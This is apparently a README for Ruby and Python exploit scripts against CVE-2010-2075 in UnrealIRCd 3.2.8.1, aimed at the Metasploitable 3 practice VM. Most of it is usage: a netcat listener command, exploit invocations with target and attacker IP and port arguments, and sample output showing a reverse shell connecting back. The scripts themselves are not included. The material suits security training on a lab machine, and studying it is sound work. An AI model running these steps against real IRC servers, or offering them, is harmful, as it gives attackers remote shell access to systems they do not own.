
Ruby and Python exploit for CVE-2010-2075 targeting UnrealIRCd 3.2.8.1, providing remote reverse shell access on Metasploitable 3.
On Attacker's shell
nc -nlvp 1111
On victim's shell
ruby exploit.rb 127.0.0.1
Expected output on attacker's shell
listening on [any] 1111 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 48144
boba_fett
On victim's shell
python3 exploit.py -ri 127.0.0.1 -rp 6697 -cmd <command> -li <attacker_ip> -lp <attacker_port>
On Attacker's shell
nc -nlvp 1111